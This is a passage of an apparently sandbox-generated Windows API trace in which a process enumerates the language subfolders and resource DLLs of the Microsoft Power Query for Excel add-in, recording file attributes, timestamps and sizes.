hFindFile=0xf71e80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1920897, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1920897, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x196cd32, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x87aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 0 [0047.639] FindClose (in: hFindFile=0xf71e80 | out: hFindFile=0xf71e80) returned 1 [0047.640] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.640] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x56d17f1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56d17f1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56d17f1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventSource.dll", cAlternateFileName="EVENTS~1.DLL")) returned 1 [0047.640] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6bae279, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6bae279, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi", cAlternateFileName="")) returned 1 [0047.640] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\fi\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6bae279, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6bae279, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71b40 [0047.641] FindNextFileW (in: hFindFile=0xf71b40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6bae279, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6bae279, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.641] FindNextFileW (in: hFindFile=0xf71b40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf47e9c8f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf480feb5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xeaa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.641] FindNextFileW (in: hFindFile=0xf71b40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6bae279, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6bae279, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6bae279, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.641] FindNextFileW (in: hFindFile=0xf71b40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4c3d17b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4c3d17b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4c63313, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x31aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.641] FindNextFileW (in: hFindFile=0xf71b40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x595a0ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x595a0ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x59cc74e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x89040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.641] FindNextFileW (in: hFindFile=0xf71b40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x595a0ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x595a0ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x59cc74e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x89040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 0 [0047.641] FindClose (in: hFindFile=0xf71b40 | out: hFindFile=0xf71b40) returned 1 [0047.642] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.642] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x60db08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x60db08, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr", cAlternateFileName="")) returned 1 [0047.642] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\fr\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x60db08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x60db08, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf720c0 [0047.643] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x60db08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x60db08, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.643] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6bad1cb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6bad1cb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6bd3439, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x10040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.643] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4ba375b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4ba375b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4ba375b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x29040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.643] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x60db08, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x60db08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x60db08, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x34040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.643] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefd42039, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefd42039, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8faa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.643] FindNextFileW (in: hFindFile=0xf720c0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefd42039, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefd42039, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8faa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0047.643] FindClose (in: hFindFile=0xf720c0 | out: hFindFile=0xf720c0) returned 1 [0047.644] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.644] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e0a643, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x675bda6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x675bda6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="gl", cAlternateFileName="")) returned 1 [0047.644] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\gl\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e0a643, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x675bda6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x675bda6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71a80 [0047.645] FindNextFileW (in: hFindFile=0xf71a80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e0a643, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x675bda6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x675bda6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.645] FindNextFileW (in: hFindFile=0xf71a80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1e0a643, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1e0a643, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf21ea38b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.645] FindNextFileW (in: hFindFile=0xf71a80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5e78ac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5e78ac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5e78ac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.645] FindNextFileW (in: hFindFile=0xf71a80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x675bda6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x675bda6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6781ff8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.645] FindNextFileW (in: hFindFile=0xf71a80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfb67b102, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb67b102, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb6c7584, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8a040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.645] FindNextFileW (in: hFindFile=0xf71a80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfb67b102, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb67b102, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb6c7584, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8a040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 0 [0047.645] FindClose (in: hFindFile=0xf71a80 | out: hFindFile=0xf71a80) returned 1 [0047.646] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.646] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c8cf9c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he", cAlternateFileName="")) returned 1 [0047.646] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\he\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c8cf9c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71fc0 [0047.647] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c8cf9c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.647] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6e5cc4e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.647] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1c8cf9c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1c8cf9c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1c8cf9c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2aaa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.647] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf41f3e26, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf41f3e26, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4266542, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x37aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.647] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x7fd9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7fd9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x98040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.648] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x7fd9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7fd9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x98040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 0 [0047.648] FindClose (in: hFindFile=0xf71fc0 | out: hFindFile=0xf71fc0) returned 1 [0047.648] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.648] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf43e3cb7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6c93006, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c93006, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hi", cAlternateFileName="")) returned 1 [0047.648] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\hi\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf43e3cb7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6c93006, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c93006, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71e80 [0047.649] FindNextFileW (in: hFindFile=0xf71e80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf43e3cb7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6c93006, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c93006, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.649] FindNextFileW (in: hFindFile=0xf71e80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf43e3cb7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf43e3cb7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4409f1c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.649] FindNextFileW (in: hFindFile=0xf71e80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6c93006, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6c93006, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c93006, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x36040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.649] FindNextFileW (in: hFindFile=0xf71e80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf80fc2c4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80fc2c4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80fc2c4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x46aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.649] FindNextFileW (in: hFindFile=0xf71e80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa4733b6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa4733b6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa4995f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xd2040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.650] FindNextFileW (in: hFindFile=0xf71e80, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa4733b6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa4733b6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa4995f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xd2040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 0 [0047.650] FindClose (in: hFindFile=0xf71e80 | out: hFindFile=0xf71e80) returned 1 [0047.650] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.650] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ac3289, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b61d36, 